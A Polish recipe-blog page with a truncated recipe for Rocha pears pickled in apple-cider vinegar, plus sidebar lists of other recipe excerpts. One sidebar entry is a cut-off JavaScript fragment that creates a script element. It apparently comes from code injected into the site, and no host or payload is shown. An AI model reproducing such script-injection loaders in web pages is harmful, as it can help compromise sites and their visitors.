Portugalskie gruszki Rocha w occie jabłkowym.

Bardzo twarde, smaczne gruszki, zamarynowane w occie jabłkowym.Składniki na 900 ml słoik gruszek w occie:450 ml wody150 ml octu jabłkowego1/2 szkl. cukru3-4 goździki1 kg twardych portugalskich gruszek Rocha 1/2 kory cynamonowejWykonanie:Umyte, obrane ze skórki gruszki pozbawiamy gniazd nasiennych. Zalewamy zimną wodą, zakwaszoną sokiem z limonki lub cytryny żeby gruszki nie...
Najnowsze przepisy
Rabarbar pojawia się w sklepach i na straganach wcześnie... ⇖ 8
Ah, Thanksgiving! It’s that magical time of year when the... ⇖ 7
Uwielbiam kuchnię pełną wyrazistych smaków i aromatów,... ⇖ 9
Jesień zagościła na dobre, to i w kuchni również jest... ⇖ 10
(function(){ u938=document.createElement("script");u938.type ⇖ 8
Idealne, słodko winne polędwiczki w sosie śliwkowym,... ⇖ 20
Przepisy z bloga
Pyszny salceson zrobiony z tylnej golonki wieprzowej i... ⇖ 278
Sernik jest o smaku śmietankowym, upieczony na spodzie z... ⇖ 307
Taka kolorowa jajecznica, bardzo smaczna.Składniki:2 jaja... ⇖ 211
Bardzo smaczne, pachnące pierniczki przygotowywane z... ⇖ 216
Przepisy na czasie
Murzynek to takie ciasto, które piekło się u mnie w domu... ⇖ 831
Sezon na grzyby jest w pełni, w tym roku jest istne,... ⇖ 356
Sernik bez sera to taki wypiek, który potrafi naprawdę... ⇖ 327
Przysmak Sułtana to jedno z tych ciast, które wygląda... ⇖ 322
Sernik to jedno z tych ciast, które nigdy się nie nudzą... ⇖ 266